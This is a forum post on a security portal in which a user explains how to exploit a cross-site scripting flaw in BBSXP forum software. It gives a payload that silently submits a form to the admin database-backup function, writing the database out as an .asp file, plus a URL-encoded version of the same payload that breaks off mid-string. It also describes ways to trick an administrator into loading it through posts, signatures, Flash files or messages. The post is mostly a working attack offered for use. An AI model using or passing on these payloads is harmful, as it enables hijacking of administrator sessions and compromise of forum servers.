Waraxe IT Security Portal

linzi · Beginner

hey all... I come from china n this is my frist time to wirte article in
english,so forgive my english.
i hope this page can help u.

so far as i know there r many forums hv function about add admin n backup database.

For the XSS exploitation,I think we can be a admin first.

we should know if we were admin n what we can do.

maybe we can add an admin account or backup database.

ok,go n hv a look about my test:

Eg:http://127.0.0.1/bbsxp/page2.asp?username=<script>alert('test')</script>

if we were admin n we hv login,we can add an administrator.

test code:

http://127.0.0.1/bbsxp/page2.asp?username=<body onload="javascript:document.forms[0].submit()"><form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"><input value="database/bbsxp.mdb" name="yl" ><input value="database/shit.asp" name="bf" ></body></html>

if admin access above code,it will creat a new file in database/shit.asp by function of backup data.

we also can use encode:
http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%66%6F%72%6D%73%5B%30%5D%2E%73%75%62%6D%69%74%28%29%22%3E%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%62%62%73%78%70%2F%61%64%6D%69%6E%5F%66%73%6F%2E%61%73%70%3F%6D%65%6E%75%3D%62%61%6B%62%66%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%62%62%73%78%70%2E%6D%64%62%22%20%6E%61%6D%65%3D%22%79%6C%22%20%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%73%68

how to use it?

we can inject above code into a flash,and post a new topic n spoof admin

to visit it.

many forums can use signature.we can use it too.

or send a message to admin and so on with that code.

my msn:linzihk@hotmail.com

trace · Regular user